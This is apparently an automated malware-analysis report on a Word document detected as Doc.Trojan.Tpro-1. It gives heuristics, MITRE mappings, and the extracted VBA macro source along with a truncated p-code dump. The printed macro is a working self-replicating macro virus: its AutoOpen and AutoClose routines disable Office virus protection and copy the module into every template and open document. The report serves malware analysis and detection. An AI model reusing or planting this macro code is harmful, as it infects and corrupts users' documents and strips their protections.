MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is identified as malicious by ClamAV and contains critical AutoOpen and AutoClose VBA macros. The AutoClose macro explicitly disables virus protection. The AutoOpen macro attempts to modify application templates, potentially to establish persistence or distribute further malware, by exporting and importing a VBA module to a specific path. The exact payload or ultimate goal is unclear due to truncation, but the techniques indicate a downloader or dropper.
Heuristics 5
-
ClamAV: Doc.Trojan.Tpro-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Tpro-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7402 bytes |
SHA-256: d66e52110302777029a73ff72d7049dde03ee0ad36d73ef3431dd848e0151537 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoClose()
Application.Options.VirusProtection = False
End Sub
Sub AutoOpen()
On Error GoTo ErrorCL
Const aLin As Long = 73
Dim aTemp As Variant
Dim aTName As String
Dim aTPro As Variant
Dim aPro As Variant
Dim aName As String
Dim aDoc As Variant
Dim aCodeLin As Long
Dim aTCodeLin As Long
With Application.Options
.VirusProtection = False
.SaveInterval = 1
End With
'D--N
For Each aTemp In Application.Templates
With aTemp.VBProject
aTName = .VBComponents(1).Name
aTCodeLin = .VBComponents("Module1").CodeModule.CountOfLines
If aTCodeLin <> aLin Then
For Each aTPro In .VBComponents
If aTPro.Name <> aTName Then
.VBComponents.Remove (aTPro)
End If
Next aTPro
ActiveDocument.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
.VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
aTemp.Save
.VBComponents(1).Name = "ThisDocuments"
End If
End With
Next aTemp
'N--D
For Each aDoc In Application.Documents
With aDoc.VBProject
aName = .VBComponents(1).Name
aCodeLin = .VBComponents("Module1").CodeModule.CountOfLines
If aCodeLin <> aLin Then
For Each aPro In .VBComponents
If aPro.Name <> aName Then
.VBComponents.Remove (aPro)
End If
Next aPro
.VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
Application.ActiveDocument.Save
End If
End With
Next aDoc
Exit Sub
ErrorCL:
Select Case Err.Number
Case 53 'There is Not Basic.bas
Application.NormalTemplate.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
Resume
Case -2147352565
aCodeLin = 0
Resume Next
End Select
End Sub
' Processing file: /opt/analyzer/scan_staging/27ebbe4f46774e1594d8272c72704274.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Module1 - 3906 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' LitVarSpecial (False)
' Ld Application
' MemLd Options
' MemSt VirusProtection
' Line #2:
' EndSub
' Line #3:
' FuncDefn (Sub AutoOpen())
' Line #4:
' OnError ErrorCL
' Line #5:
' Line #6:
' Dim (Const)
' LitDI2 0x0049
' VarDefn aLin (As Long)
' Line #7:
' Line #8:
' Dim
' VarDefn aTemp (As Variant)
' Line #9:
' Dim
' VarDefn aTName (As String)
' Line #10:
' Dim
' VarDefn aTPro (As Variant)
' Line #11:
' Dim
' VarDefn aPro (As Variant)
' Line #12:
' Dim
' VarDefn aName (As String)
' Line #13:
' Dim
' VarDefn aDoc (As Variant)
' Line #14:
' Dim
' VarDefn aCodeLin (As Long)
' Line #15:
' Dim
' VarDefn aTCodeLin (As Long)
' Line #16:
' Line #17:
' StartWithExpr
' Ld Application
' MemLd Options
' With
' Line #18:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #19:
' LitDI2 0x0001
' MemStWith SaveInterval
' Line #20:
' EndWith
' Line #21:
' Line #22:
' QuoteRem 0x0005 0x0004 "D--N"
' Line #23:
' StartForVariable
' Ld aTemp
' EndForVariable
' Ld Application
' MemLd Templates
' ForEach
' Line #24:
' StartWithExpr
' Ld aTemp
' MemLd VBProject
' With
' Line #25:
' LitDI2 0x0001
' ArgsMe
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.